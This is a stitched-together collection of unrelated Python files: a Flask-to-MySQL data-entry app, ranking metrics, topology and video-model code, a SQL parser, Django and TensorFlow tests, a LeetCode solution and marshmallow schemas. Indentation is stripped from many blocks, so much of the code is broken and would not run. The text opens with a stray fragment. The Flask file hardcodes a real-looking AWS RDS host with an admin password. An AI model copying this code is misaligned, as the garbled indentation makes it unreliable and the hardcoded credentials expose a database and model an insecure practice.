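#     mathematica_import({"ImportType": "List", "ImportValue": [1, 2, 3]})  # -> [1, 2, 3]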
|
from flask import Flask, request, render_template
import mysql.connector
app = Flask(__name__)
connection = mysql.connector.connect(host='database-maui.ct7yl5rjhgtx.us-east-1.rds.amazonaws.com',
database='mauidb',
user='admin',
password='Adminpass')
@app.route('/', methods = ['GET','POST'])
def enter_data_values():
if request.method == 'POST':
text1 = request.form['scientist']
text2 = request.form['location']
text3 = request.form['date']
text4 = request.form['result']
cursor = connection.cursor()
cursor.execute("INSERT INTO TestTable3 (scientist, location, date, result) VALUES (%s,%s,%s,%s)", (text1, text2, text3, text4))
connection.commit()
        cursor.close()  # close the cursor; the module-level connection stays open for later requests
return render_template('DataEntryUI.html')
if __name__ == '__main__':
app.run(host="0.0.0.0", port=80)
|
'''
Implementation of the nDCG metric for ranking evaluation.
Balazs Kovacs, 2017
'''
import numpy as np
def dcg(rel_scores, k=None, use_exp=False):
'''
Computes the DCG metric as defined in https://en.wikipedia.org/wiki/Discounted_cumulative_gain
:param rel_scores: List of relevance scores.
:param k: We will compute DCG@k. If k is None, we will set it to
len(rel_scores).
:param use_exp: If True, we use 2 ** (relevance score) - 1 in the numerator
instead of (relevance score).
:returns: The DCG score of the input
'''
if k is None:
k = len(rel_scores)
rel_scores = np.array(rel_scores, dtype=float)[:k]
if use_exp:
num = 2 ** rel_scores - 1
else:
num = rel_scores
den = np.log2(np.arange(k) + 2)
return np.sum(num / den)
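# Worked example (linear gains, illustrative): dcg([3, 2, 3])
#     = 3/log2(2) + 2/log2(3) + 3/log2(4) ~= 3 + 1.262 + 1.5 = 5.762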
def ndcg(rel_scores, k=None, use_exp=False):
'''
Computes the nDCG metric as defined in https://en.wikipedia.org/wiki/Discounted_cumulative_gain#Normalized_DCG
:param rel_scores: List of relevance scores.
:param k: We will compute nDCG@k. If k is None, we will set it to
len(rel_scores).
:param use_exp: If True, we use 2 ** (relevance score) - 1 in the numerator
instead of (relevance score).
:returns: The nDCG score of the input
'''
if k is None:
k = len(rel_scores)
    dcg_val = dcg(rel_scores=rel_scores, k=k, use_exp=use_exp)
    idcg_val = dcg(rel_scores=sorted(rel_scores, reverse=True), k=k, use_exp=use_exp)
    if idcg_val == 0:
        return 0.0  # all relevance scores are zero; avoid dividing by zero
    return dcg_val / idcg_val
if __name__ == '__main__':
    # Worked example from the Wikipedia article: with use_exp=False these
    # scores give DCG ~= 6.861 and nDCG ~= 0.961.
    r = [3, 2, 3, 0, 1, 2]
    for use_exp in [False, True]:
        print(dcg(rel_scores=r, use_exp=use_exp))
        print(ndcg(rel_scores=r, use_exp=use_exp))
|
import math
import numpy as np
from sklearn.metrics import pairwise_distances
from scipy.spatial import distance
from scripts.ssc.persistence_pairings_visualization.Pseudo_AlphaBetaWitnessComplex import \
count_pairings
from scripts.ssc.persistence_pairings_visualization.utils_definitions import make_plot
from src.datasets.datasets import SwissRoll
def wl_table(witnesses, landmarks):
return pairwise_distances(witnesses,landmarks)
def update_register_simplex(register, i_add, i_dist, max_dim = math.inf):
register_add = []
simplex_add = []
for element in register:
if len(element)< max_dim:
element_copy = element.copy()
element_copy.append(i_add)
register_add.append(element_copy)
simplex_add.append([element_copy, i_dist])
return register_add, simplex_add
def get_pairs_0(distances):
simplices = []
for row_i in range(distances.shape[0]):
col = distances[row_i,:]
sort_col = sorted([*enumerate(col)], key=lambda x: x[1])
simplices_temp = []
register = []
for i in range(len(sort_col)):
register_add, simplex_add = update_register_simplex(register.copy(), sort_col[i][0],sort_col[i][1],2)
register += register_add
register.append([sort_col[i][0]])
simplices_temp += simplex_add
simplices += simplices_temp
return sorted(simplices, key=lambda t: t[1])
def get_pairs_1(distances, landmarks):
pairs = []
for row_i in range(distances.shape[0]):
temp = []
col = distances[row_i,:]
sort_col = sorted([*enumerate(col)], key=lambda x: x[1])
i1, i2 = sort_col[0][0],sort_col[1][0]
dist1, dist2 = sort_col[0][1], sort_col[1][1]
temp.append([i1,i2])
temp.append((dist1+dist2))
pairs.append(temp)
return sorted(pairs, key=lambda t: t[1])
def get_persistence_pairs(pairs, n_landmarks):
indices = list(range(0, n_landmarks))
pairs_filtered = []
for element in pairs:
pair = element[0]
if len(pair) == 2:
# print(pair)
add = False
if pair[0] in indices:
add = True
indices.remove(pair[0])
if pair[1] in indices:
add = True
indices.remove(pair[1])
if add:
pairs_filtered.append(pair)
if len(indices) == 0:
break
else:
pass
return pairs_filtered
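# Note: pairs arrive sorted by filtration value, and a pair is kept only when it
# covers at least one landmark index not seen before, so the filtered result is
# a spanning-forest-like set of edges over the landmarks.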
if __name__ == "__main__":
# n_samples_array = [32,48,64,96,128]
# n_witnesses_array = [2048,4096]
# seeds = [10,13,20]
# for n_witnesses in n_witnesses_array:
# for seed in seeds:
# for n_samples in n_samples_array:
#
# name = 'witness_ssc_nl{}_nw{}_seed{}'.format(n_samples, n_witnesses, seed)
# dataset_sampler = SwissRoll()
# n_landmarks = n_samples
# seed = seed
# landmarks, color = dataset_sampler.sample(n_landmarks, seed = seed)
# witnesses, _ = dataset_sampler.sample(n_witnesses, seed=(seed+17))
#
#
# distances = wl_table(witnesses,landmarks)
# pairs = get_pairs_1(distances, landmarks)
#
# pairs_filtered = get_persistence_pairs(pairs, n_samples)
#
# count_pairings(n_samples, pairs_filtered)
# make_plot(landmarks, pairs_filtered, color, name=name)
    # Full sweep (kept for reference):
    # n_samples_array = [32,48,64,96,128]
    # n_witnesses_array = [256,512,1024]
    # seeds = [10,13,20]
    n_samples_array = [64]
    n_witnesses_array = [512]
    seeds = [27]
for n_witnesses in n_witnesses_array:
for seed in seeds:
for n_samples in n_samples_array:
name = 'witness_ssc_corrected_nl{}_nw{}_seed{}'.format(n_samples, n_witnesses, seed)
                dataset_sampler = SwissRoll()
                n_landmarks = n_samples
                landmarks, color = dataset_sampler.sample(n_landmarks, seed=seed)
                witnesses, _ = dataset_sampler.sample(n_witnesses, seed=(seed+17))
distances = wl_table(witnesses,landmarks)
pairs = get_pairs_0(distances)
pairs_filtered = get_persistence_pairs(pairs, n_samples)
count_pairings(n_samples, pairs_filtered)
make_plot(landmarks, pairs_filtered, color, name=name)
|
#!/usr/bin/env python3
# Copyright (C) Alibaba Group Holding Limited.
""" S3D/S3DG branch. """
import torch
import torch.nn as nn
from models.base.base_blocks import (
BRANCH_REGISTRY, InceptionBaseConv3D
)
class InceptionBlock3D(nn.Module):
"""
Element constructing the S3D/S3DG.
See models/base/backbone.py L99-186.
    Modified from https://github.com/TengdaHan/CoCLR/blob/main/backbone/s3dg.py.
"""
def __init__(self, cfg, in_planes, out_planes):
super(InceptionBlock3D, self).__init__()
_gating = cfg.VIDEO.BACKBONE.BRANCH.GATING
assert len(out_planes) == 6
assert isinstance(out_planes, list)
[num_out_0_0a,
num_out_1_0a, num_out_1_0b,
num_out_2_0a, num_out_2_0b,
num_out_3_0b] = out_planes
self.branch0 = nn.Sequential(
InceptionBaseConv3D(cfg, in_planes, num_out_0_0a, kernel_size=1, stride=1),
)
self.branch1 = nn.Sequential(
InceptionBaseConv3D(cfg, in_planes, num_out_1_0a, kernel_size=1, stride=1),
BRANCH_REGISTRY.get(cfg.VIDEO.BACKBONE.BRANCH.NAME)(cfg, num_out_1_0a, num_out_1_0b, kernel_size=3, stride=1, padding=1),
)
self.branch2 = nn.Sequential(
InceptionBaseConv3D(cfg, in_planes, num_out_2_0a, kernel_size=1, stride=1),
BRANCH_REGISTRY.get(cfg.VIDEO.BACKBONE.BRANCH.NAME)(cfg, num_out_2_0a, num_out_2_0b, kernel_size=3, stride=1, padding=1),
)
self.branch3 = nn.Sequential(
nn.MaxPool3d(kernel_size=(3, 3, 3), stride=1, padding=1),
InceptionBaseConv3D(cfg, in_planes, num_out_3_0b, kernel_size=1, stride=1),
)
self.out_channels = sum([num_out_0_0a, num_out_1_0b, num_out_2_0b, num_out_3_0b])
self.gating = _gating
if _gating:
self.gating_b0 = SelfGating(num_out_0_0a)
self.gating_b1 = SelfGating(num_out_1_0b)
self.gating_b2 = SelfGating(num_out_2_0b)
self.gating_b3 = SelfGating(num_out_3_0b)
def forward(self, x):
x0 = self.branch0(x)
x1 = self.branch1(x)
x2 = self.branch2(x)
x3 = self.branch3(x)
if self.gating:
x0 = self.gating_b0(x0)
x1 = self.gating_b1(x1)
x2 = self.gating_b2(x2)
x3 = self.gating_b3(x3)
out = torch.cat((x0, x1, x2, x3), 1)
return out
class SelfGating(nn.Module):
def __init__(self, input_dim):
super(SelfGating, self).__init__()
self.fc = nn.Linear(input_dim, input_dim)
def forward(self, input_tensor):
"""Feature gating as used in S3D-G"""
spatiotemporal_average = torch.mean(input_tensor, dim=[2, 3, 4])
weights = self.fc(spatiotemporal_average)
weights = torch.sigmoid(weights)
return weights[:, :, None, None, None] * input_tensor
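# Shape sketch for SelfGating (illustrative): an input of shape (N, C, T, H, W)
# is averaged over (T, H, W) to (N, C), passed through the linear layer, and the
# sigmoid output is broadcast back as per-channel gating weights.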
@BRANCH_REGISTRY.register()
class STConv3d(nn.Module):
"""
Element constructing the S3D/S3DG.
See models/base/backbone.py L99-186.
    Modified from https://github.com/TengdaHan/CoCLR/blob/main/backbone/s3dg.py.
"""
def __init__(self,cfg,in_planes,out_planes,kernel_size,stride,padding=0):
super(STConv3d, self).__init__()
if isinstance(stride, tuple):
t_stride = stride[0]
stride = stride[-1]
else: # int
t_stride = stride
self.bn_mmt = cfg.BN.MOMENTUM
self.bn_eps = cfg.BN.EPS
self._construct_branch(
cfg,
in_planes,
out_planes,
kernel_size,
stride,
t_stride,
padding
)
def _construct_branch(
self,
cfg,
in_planes,
out_planes,
kernel_size,
stride,
t_stride,
padding=0
):
self.conv1 = nn.Conv3d(in_planes, out_planes, kernel_size=(1,kernel_size,kernel_size),
stride=(1,stride,stride),padding=(0,padding,padding), bias=False)
self.conv2 = nn.Conv3d(out_planes,out_planes,kernel_size=(kernel_size,1,1),
stride=(t_stride,1,1),padding=(padding,0,0), bias=False)
self.bn1=nn.BatchNorm3d(out_planes, eps=self.bn_eps, momentum=self.bn_mmt)
self.bn2=nn.BatchNorm3d(out_planes, eps=self.bn_eps, momentum=self.bn_mmt)
self.relu = nn.ReLU(inplace=True)
# init
self.conv1.weight.data.normal_(mean=0, std=0.01) # original s3d is truncated normal within 2 std
self.conv2.weight.data.normal_(mean=0, std=0.01) # original s3d is truncated normal within 2 std
self.bn1.weight.data.fill_(1)
self.bn1.bias.data.zero_()
self.bn2.weight.data.fill_(1)
self.bn2.bias.data.zero_()
def forward(self,x):
x=self.conv1(x)
x=self.bn1(x)
x=self.relu(x)
x=self.conv2(x)
x=self.bn2(x)
x=self.relu(x)
return x
|
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
# coding=utf-8
# --------------------------------------------------------------------------
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class ResponseBingMatchingStream(Model):
"""ResponseBingMatchingStream.
:param name:
:type name: str
:param score:
:type score: int
"""
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'score': {'key': 'score', 'type': 'int'},
}
def __init__(self, **kwargs):
super(ResponseBingMatchingStream, self).__init__(**kwargs)
self.name = kwargs.get('name', None)
self.score = kwargs.get('score', None)
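# Usage sketch (field values are illustrative):
#     stream = ResponseBingMatchingStream(name='match-1', score=87)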
|
class Stack:
def __init__(self):
self.items = []
def is_empty(self):
        return not self.items
def push(self, val):
self.items.append(val)
def pop(self):
if self.is_empty():
return None
return self.items.pop()
def peek(self):
if self.is_empty():
return None
return self.items[-1]
def __len__(self):
return len(self.items)
def size(self):
return len(self)
def print_stack(self):
print(self.items[::-1])
if __name__ == "__main__":
stack = Stack()
stack.push(1)
stack.push(2)
stack.push(3)
print(stack.pop())
stack.print_stack()
print(len(stack), stack.peek(), stack.size())
|
#coding=utf8
from asdl.sql.parser.parser_base import Parser
from asdl.asdl import ASDLGrammar
from asdl.asdl_ast import RealizedField, AbstractSyntaxTree
class ParserV0(Parser):
""" In this version, we eliminate all cardinality ? and restrict that * must have at least one item
"""
def parse_select(self, select_clause: list, select_field: RealizedField):
"""
ignore cases agg(col_id1 op col_id2) and agg(col_id1) op agg(col_id2)
"""
select_clause = select_clause[1] # list of (agg, val_unit)
unit_op_list = ['Unary', 'Minus', 'Plus', 'Times', 'Divide']
agg_op_list = ['None', 'Max', 'Min', 'Count', 'Sum', 'Avg']
for agg, val_unit in select_clause:
if agg != 0: # agg col_id
ast_node = AbstractSyntaxTree(self.grammar.get_prod_by_ctr_name('Unary'))
col_node = AbstractSyntaxTree(self.grammar.get_prod_by_ctr_name(agg_op_list[agg]))
col_node.fields[0].add_value(int(val_unit[1][1]))
ast_node.fields[0].add_value(col_node)
else: # binary_op col_id1 col_id2
ast_node = self.parse_val_unit(val_unit)
select_field.add_value(ast_node)
def parse_from(self, from_clause: dict, from_field: RealizedField):
"""
Ignore from conditions, since it is not evaluated in evaluation script
"""
table_units = from_clause['table_units']
t = table_units[0][0]
if t == 'table_unit':
ast_node = AbstractSyntaxTree(self.grammar.get_prod_by_ctr_name('FromTable'))
tables_field = ast_node.fields[0]
for _, v in table_units:
tables_field.add_value(int(v))
else:
assert t == 'sql'
v = table_units[0][1]
ast_node = AbstractSyntaxTree(self.grammar.get_prod_by_ctr_name('FromSQL'))
ast_node.fields[0].add_value(self.parse_sql(v))
from_field.add_value(ast_node)
def parse_groupby(self, groupby_clause: list, having_clause: list, groupby_field: RealizedField):
col_ids = []
for col_unit in groupby_clause:
col_ids.append(col_unit[1]) # agg is None and isDistinct False
if having_clause:
ast_node = AbstractSyntaxTree(self.grammar.get_prod_by_ctr_name('Having'))
col_units_field, having_fields = ast_node.fields
having_fields.add_value(self.parse_conds(having_clause))
else:
ast_node = AbstractSyntaxTree(self.grammar.get_prod_by_ctr_name('NoHaving'))
col_units_field = ast_node.fields[0]
for col_unit in groupby_clause:
col_units_field.add_value(self.parse_col_unit(col_unit))
groupby_field.add_value(ast_node)
def parse_orderby(self, orderby_clause: list, limit: int, orderby_field: RealizedField):
if limit is None:
ast_node = AbstractSyntaxTree(self.grammar.get_prod_by_ctr_name('Asc')) if orderby_clause[0] == 'asc' \
else AbstractSyntaxTree(self.grammar.get_prod_by_ctr_name('Desc'))
else:
ast_node = AbstractSyntaxTree(self.grammar.get_prod_by_ctr_name('AscLimit')) if orderby_clause[0] == 'asc' \
else AbstractSyntaxTree(self.grammar.get_prod_by_ctr_name('DescLimit'))
col_units_field = ast_node.fields[0]
for val_unit in orderby_clause[1]:
col_units_field.add_value(self.parse_col_unit(val_unit[1]))
orderby_field.add_value(ast_node) |
from __future__ import unicode_literals
from django.test import override_settings
from mayan.apps.rest_api.tests.base import BaseAPITestCase
from ..classes import Template
TEST_TEMPLATE_RESULT = '<div'
class CommonAPITestCase(BaseAPITestCase):
auto_login_user = False
def _request_content_type_list_api_view(self):
return self.get(viewname='rest_api:content-type-list')
def test_content_type_list_api_view(self):
response = self._request_content_type_list_api_view()
self.assertEqual(response.status_code, 200)
def test_template_detail_anonymous_view(self):
template_main_menu = Template.get(name='menu_main')
response = self.get(path=template_main_menu.get_absolute_url())
self.assertNotContains(
response=response, text=TEST_TEMPLATE_RESULT, status_code=403
)
@override_settings(LANGUAGE_CODE='de')
def test_template_detail_view(self):
self.login_user()
template_main_menu = Template.get(name='menu_main')
response = self.get(path=template_main_menu.get_absolute_url())
self.assertContains(
response=response, text=TEST_TEMPLATE_RESULT, status_code=200
)
|
#!/usr/bin/python
# ==============================================================================
# Author: Tao Li ([email protected])
# Date: May 18, 2015
# Question: 054-Spiral-Matrix
# Link: https://leetcode.com/problems/spiral-matrix/
# ==============================================================================
# Given a matrix of m x n elements (m rows, n columns), return all elements of the matrix in spiral order.
#
# For example,
# Given the following matrix:
#
# [
# [ 1, 2, 3 ],
# [ 4, 5, 6 ],
# [ 7, 8, 9 ]
# ]
#
# You should return [1,2,3,6,9,8,7,4,5].
# ==============================================================================
# Method: Hash Table; if statements for the four traversal directions
# Time Complexity: O(m*n)
# Space Complexity: O(m*n)
# ==============================================================================
class Solution:
# @param {integer[][]} matrix
# @return {integer[]}
def spiralOrder(self, matrix):
if not matrix:
return []
elif len(matrix) == 1:
return matrix[0]
dic = {}
for i in range(len(matrix)):
for j in range(len(matrix[0])):
dic[i, j] = 0
counter = 0
stack = []
i = j = 0
direction = 0
while counter < len(matrix) * len(matrix[0]):
stack.append(matrix[i][j])
dic[i, j] = 1
if direction == 0:
if dic.get((i, j+1)) is not None and dic.get((i, j+1)) != 1:
j += 1
else:
direction += 1
i += 1
elif direction == 1:
if dic.get((i+1, j)) is not None and dic.get((i+1, j)) != 1:
i += 1
else:
direction += 1
j -= 1
elif direction == 2:
if dic.get((i, j-1)) is not None and dic.get((i, j-1)) != 1:
j -= 1
else:
direction += 1
i -= 1
elif direction == 3:
if dic.get((i-1, j)) is not None and dic.get((i-1, j)) != 1:
i -= 1
else:
direction += 1
j += 1
counter += 1
direction %= 4
return stack
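# For comparison, a boundary-based traversal (an assumed alternative, not the
# author's method) visits each layer with four explicit sweeps and needs only
# O(1) extra space beyond the output list.
def spiral_order_boundaries(matrix):
    result = []
    if not matrix:
        return result
    top, bottom = 0, len(matrix) - 1
    left, right = 0, len(matrix[0]) - 1
    while top <= bottom and left <= right:
        for j in range(left, right + 1):        # left -> right along the top row
            result.append(matrix[top][j])
        for i in range(top + 1, bottom + 1):    # top -> bottom along the right column
            result.append(matrix[i][right])
        if top < bottom and left < right:
            for j in range(right - 1, left - 1, -1):  # right -> left along the bottom row
                result.append(matrix[bottom][j])
            for i in range(bottom - 1, top, -1):      # bottom -> top along the left column
                result.append(matrix[i][left])
        top, bottom, left, right = top + 1, bottom - 1, left + 1, right - 1
    return result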
if __name__ == '__main__':
matrix = [[ 1, 2, 3 ],[ 4, 5, 6 ],[ 7, 8, 9 ]]
# matrix = [[1,2, 3, 4], [5, 6, 7, 8]]
# matrix = [[1,2,3]]
    print(Solution().spiralOrder(matrix)) |
#!/usr/bin/env python3
"""
Normalize
"""
import numpy as np
def normalization_constants(X):
"""
normalizing
"""
m = X.shape[0]
mean = np.sum(X / m, axis=0)
std = np.sqrt(np.sum(((X - mean) ** 2), axis=0) / m)
return mean, std
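# A minimal usage sketch (assumed, not part of the original module): the
# returned constants z-score a design matrix column-wise.
if __name__ == "__main__":
    X = np.random.randn(100, 3) * 5 + 2
    m, s = normalization_constants(X)
    X_norm = (X - m) / s
    print(X_norm.mean(axis=0), X_norm.std(axis=0))  # ~0 and ~1 per column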
|
from marshmallow import Schema, fields, validate
class AuthSchema(Schema):
firstname = fields.Str(
required=True,
error_messages={"required": "Firstname is required."},
validate=validate.Length(min=2, max=32),
)
lastname = fields.Str(
required=True,
error_messages={"required": "Lastname is required."},
validate=validate.Length(min=2, max=32),
)
email = fields.Email(
required=True,
error_messages={"required": "Email is required."}
)
password = fields.Str(
required=True,
load_only=True,
error_messages={"required": "Password is required."}
)
class UserSchema(Schema):
id = fields.Int(dump_only=True)
email = fields.Email(
required=True,
error_messages={"required": "Email is required."}
)
password = fields.Str(
required=True,
load_only=True,
validate=validate.Length(min=6),
error_messages={"required": "Password is required."}
)
is_active = fields.Boolean()
is_admin = fields.Boolean()
created_on = fields.DateTime(dump_only=True)
updated_on = fields.DateTime(dump_only=True)
sign_in_count = fields.Int(dump_only=True)
current_sign_in_on = fields.DateTime(dump_only=True)
last_sign_in_on = fields.DateTime(dump_only=True)
current_sign_in_ip = fields.Str(
dump_only=True,
validate=validate.Length(max=32),
)
last_sign_in_ip = fields.Str(
dump_only=True,
validate=validate.Length(max=32),
)
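# A minimal usage sketch (illustrative data; assumes marshmallow 3.x, where
# Schema.load returns the deserialized dict and raises ValidationError):
if __name__ == "__main__":
    from marshmallow import ValidationError
    try:
        user = AuthSchema().load({
            "firstname": "Ada", "lastname": "Lovelace",
            "email": "[email protected]", "password": "s3cret",
        })
        print(user)
    except ValidationError as err:
        print(err.messages)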
|
import nthmc, ftr
import tensorflow as tf
import tensorflow.keras as tk
import math, os, unittest
import sys
sys.path.append("../lib")
import field, group
class TestGenericStoutSmear(unittest.TestCase):
""" Examples:
def setUp(self):
print('setUp')
def tearDown(self):
print('tearDown')
def test_example(self):
self.assertEqual('foo'.upper(), 'FOO')
self.assertTrue('FOO'.isupper())
self.assertFalse('Foo'.isupper())
s = 'hello world'
self.assertEqual(s.split(), ['hello', 'world'])
# check that s.split fails when the separator is not a string
with self.assertRaises(TypeError):
s.split(2)
"""
def setUp(self):
pi = tf.constant(math.pi, dtype=tf.float64)
op0 = (((1,2,-1,-2), (1,-2,-1,2)),
((1,1,2,-1,-1,-2), (1,1,-2,-1,-1,2), (1,2,-1,-1,-2,1), (1,-2,-1,-1,2,1)))
op1 = (((2,-1,-2,1), (2,1,-2,-1)),
((2,2,-1,-2,-2,1), (2,2,1,-2,-2,-1), (2,-1,-2,-2,1,2), (2,1,-2,-2,-1,2)))
self.testShape = (3,2,6,8)
self.latticeShape = (self.testShape[0],)+self.testShape[2:]
self.testField = tf.random.get_global_generator().uniform(self.testShape, -math.pi, math.pi, dtype=tf.float64)
self.testMask = tf.constant([[1,0,1,0,1,0,1,0],[0,0,0,0,0,0,0,0],[1,0,1,0,1,0,1,0],[0,0,0,0,0,0,0,0],[1,0,1,0,1,0,1,0],[0,0,0,0,0,0,0,0]], dtype=tf.float64)
self.ss = [
ftr.GenericStoutSmear(((0,0),(2,2)), op0, [], ftr.Scalar(2)),
ftr.GenericStoutSmear(((0,1),(2,2)), op0, [], ftr.Scalar(2)),
ftr.GenericStoutSmear(((1,0),(2,2)), op0, [], ftr.Scalar(2)),
ftr.GenericStoutSmear(((1,1),(2,2)), op0, [], ftr.Scalar(2)),
ftr.GenericStoutSmear(((0,0),(2,2)), op1, [], ftr.Scalar(2)),
ftr.GenericStoutSmear(((0,1),(2,2)), op1, [], ftr.Scalar(2)),
ftr.GenericStoutSmear(((1,0),(2,2)), op1, [], ftr.Scalar(2)),
ftr.GenericStoutSmear(((1,1),(2,2)), op1, [], ftr.Scalar(2)),
]
for i,s in enumerate(self.ss):
s.build(self.testShape)
s.layerCoefficient.xs.assign([1.0+0.1*i, 1.0+0.01*i])
def test_mask(self):
for i,s in enumerate(self.ss):
with self.subTest(i=i):
self.assertTrue(tf.reduce_all(s.maskUpdate == tf.roll(self.testMask, shift=(i//2,i), axis=(0,1))))
def test_call(self):
for i,s in enumerate(self.ss):
with self.subTest(i=i):
y, _, _ = s(self.testField)
m = 1 - s.maskUpdate
self.assertTrue(tf.reduce_all(m*y == m*self.testField))
def test_jacob(self):
v = tf.math.reduce_prod(self.testShape[1:])
for i,s in enumerate(self.ss):
with self.subTest(i=i):
x = self.testField
with tf.GradientTape(persistent=True) as t: # persistent for jacobian without pfor
t.watch(x)
y, ld, _ = s(x)
j = t.batch_jacobian(y, x, experimental_use_pfor=False) # pfor fails for roll op
for b in range(self.testShape[0]):
ldj = 0.
for mu in range(self.testShape[1]):
                        for xi in range(self.testShape[2]):  # xi/yi avoid shadowing x and y above
                            for yi in range(self.testShape[3]):
                                ldj += tf.math.log(j[b,mu,xi,yi,mu,xi,yi])
with self.subTest(b=b):
with self.subTest(test='diagonal'):
self.assertAlmostEqual(ld[b].numpy(), ldj.numpy(), places=14)
with self.subTest(test='full matrix'):
self.assertAlmostEqual(ld[b].numpy(), tf.math.log(tf.linalg.det(tf.reshape(j[b], (v,v)))).numpy(), places=14)
def test_inv(self):
for i,s in enumerate(self.ss):
with self.subTest(i=i):
y, l, _ = s(self.testField)
z, m, invIter = s.inv(y)
if invIter >= s.invMaxIter:
tf.print('WARNING: max inverse iteration reached',invIter,'with invMaxIter',s.invMaxIter, summarize=-1)
with self.subTest(test='field'):
self.assertLess(tf.reduce_mean(tf.math.squared_difference(z, self.testField)), 1E-28)
with self.subTest(test='logdet'):
self.assertLess(tf.reduce_mean(tf.math.squared_difference(l, -m)), 1E-28)
def test_symmetry_translation(self):
for i,s in enumerate(self.ss):
with self.subTest(i=i):
y, ld, _ = s(self.testField)
sx = tf.roll(self.testField, (2,4), (2,3))
sy, sld, _ = s(sx)
with self.subTest(test='field'):
self.assertLess(tf.reduce_mean(tf.math.squared_difference(y, tf.roll(sy, (-2,-4), (2,3)))), 1E-26)
with self.subTest(test='logdet'):
self.assertLess(tf.reduce_mean(tf.math.squared_difference(ld, sld)), 1E-26)
def test_symmetry_reverseX(self):
for i,s in enumerate(self.ss):
with self.subTest(i=i):
y, ld, _ = s(self.testField)
sx = tf.reverse(self.testField, [2])
sx = tf.stack([tf.roll(-sx[:,0], -1, 1), sx[:,1]], 1)
                if s.linkDir != 1:  # first link points along the other direction
x0 = s.linkFirst[0]-1
if x0<0:
x0 += s.linkRepeat[0]
sn = ftr.GenericStoutSmear(((x0,s.linkFirst[1]),s.linkRepeat), s.updatedLoops, s.fixedLoopLayers, s.layerCoefficient)
else:
sn = s
sy, sld, _ = sn(sx)
sy = tf.reverse(tf.stack([tf.roll(-sy[:,0], 1, 1), sy[:,1]], 1), [2])
with self.subTest(test='field'):
self.assertLess(tf.reduce_mean(tf.math.squared_difference(y, sy)), 1E-26)
with self.subTest(test='logdet'):
self.assertLess(tf.reduce_mean(tf.math.squared_difference(ld, sld)), 1E-26)
def test_symmetry_reverseY(self):
for i,s in enumerate(self.ss):
with self.subTest(i=i):
y, ld, _ = s(self.testField)
sx = tf.reverse(self.testField, [3])
sx = tf.stack([sx[:,0], tf.roll(-sx[:,1], -1, 2)], 1)
                if s.linkDir != 2:  # first link points along the other direction
x1 = s.linkFirst[1]-1
if x1<0:
x1 += s.linkRepeat[1]
sn = ftr.GenericStoutSmear(((s.linkFirst[0],x1),s.linkRepeat), s.updatedLoops, s.fixedLoopLayers, s.layerCoefficient)
else:
sn = s
sy, sld, _ = sn(sx)
sy = tf.reverse(tf.stack([sy[:,0], tf.roll(-sy[:,1], 1, 2)], 1), [3])
with self.subTest(test='field'):
self.assertLess(tf.reduce_mean(tf.math.squared_difference(y, sy)), 1E-26)
with self.subTest(test='logdet'):
self.assertLess(tf.reduce_mean(tf.math.squared_difference(ld, sld)), 1E-26)
def test_symmetry_gauge(self):
G = tf.random.get_global_generator().uniform(self.latticeShape, -math.pi, math.pi, dtype=tf.float64)
u = group.U1Phase
tx = tf.stack(
[u.mul(u.mul(G,self.testField[:,d]), tf.roll(G, -1, axis=1+d), adjoint_r=True) for d in range(2)],
1)
for i,s in enumerate(self.ss):
with self.subTest(i=i):
y, ld, _ = s(self.testField)
ty = tf.stack(
[u.mul(u.mul(G,y[:,d]), tf.roll(G, -1, axis=1+d), adjoint_r=True) for d in range(2)],
1)
sy, sld, _ = s(tx)
with self.subTest(test='field'):
self.assertLess(tf.reduce_mean(tf.math.squared_difference(u.compatProj(ty), u.compatProj(sy))), 1E-26)
with self.subTest(test='logdet'):
self.assertLess(tf.reduce_mean(tf.math.squared_difference(ld, sld)), 1E-26)
class TestChain(unittest.TestCase):
def setUp(self):
pi = tf.constant(math.pi, dtype=tf.float64)
op0 = (((1,2,-1,-2), (1,-2,-1,2)),
((1,1,2,-1,-1,-2), (1,1,-2,-1,-1,2), (1,2,-1,-1,-2,1), (1,-2,-1,-1,2,1)))
op1 = (((2,-1,-2,1), (2,1,-2,-1)),
((2,2,-1,-2,-2,1), (2,2,1,-2,-2,-1), (2,-1,-2,-2,1,2), (2,1,-2,-2,-1,2)))
self.testShape = (3,2,6,8)
self.latticeShape = (self.testShape[0],)+self.testShape[2:]
self.testField = tf.random.get_global_generator().uniform(self.testShape, -math.pi, math.pi, dtype=tf.float64)
self.ss = ftr.TransformChain([
ftr.GenericStoutSmear(((0,0),(2,2)), op0, [], ftr.Scalar(2)),
ftr.GenericStoutSmear(((0,1),(2,2)), op0, [], ftr.Scalar(2)),
ftr.GenericStoutSmear(((1,0),(2,2)), op0, [], ftr.Scalar(2)),
ftr.GenericStoutSmear(((1,1),(2,2)), op0, [], ftr.Scalar(2)),
ftr.GenericStoutSmear(((0,0),(2,2)), op1, [], ftr.Scalar(2)),
ftr.GenericStoutSmear(((0,1),(2,2)), op1, [], ftr.Scalar(2)),
ftr.GenericStoutSmear(((1,0),(2,2)), op1, [], ftr.Scalar(2)),
ftr.GenericStoutSmear(((1,1),(2,2)), op1, [], ftr.Scalar(2)),
])
self.ss.build(self.testShape)
for i,s in enumerate(self.ss.chain):
s.layerCoefficient.xs.assign([1.0+0.2*i, 1.0+0.04*i])
def test_jacob(self):
v = tf.math.reduce_prod(self.testShape[1:])
x = self.testField
with tf.GradientTape(persistent=True) as t: # persistent for jacobian without pfor
t.watch(x)
y, ld, _ = self.ss(x)
j = t.batch_jacobian(y, x, experimental_use_pfor=False) # pfor fails for roll op
for b in range(self.testShape[0]):
with self.subTest(b=b):
self.assertAlmostEqual(ld[b].numpy(), tf.math.log(tf.linalg.det(tf.reshape(j[b], (v,v)))).numpy(), places=13)
def test_inv(self):
y, l, _ = self.ss(self.testField)
z, m, invIter = self.ss.inv(y)
if invIter >= self.ss.invMaxIter:
tf.print('WARNING: max inverse iteration reached',invIter,'with invMaxIter',self.ss.invMaxIter, summarize=-1)
with self.subTest(test='field'):
self.assertLess(tf.reduce_mean(tf.math.squared_difference(z, self.testField)), 1E-26)
with self.subTest(test='logdet'):
self.assertLess(tf.reduce_mean(tf.math.squared_difference(l, -m)), 1E-24)
def test_symmetry_translation(self):
y, ld, _ = self.ss(self.testField)
sx = tf.roll(self.testField, (2,4), (2,3))
sy, sld, _ = self.ss(sx)
with self.subTest(test='field'):
self.assertLess(tf.reduce_mean(tf.math.squared_difference(y, tf.roll(sy, (-2,-4), (2,3)))), 1E-26)
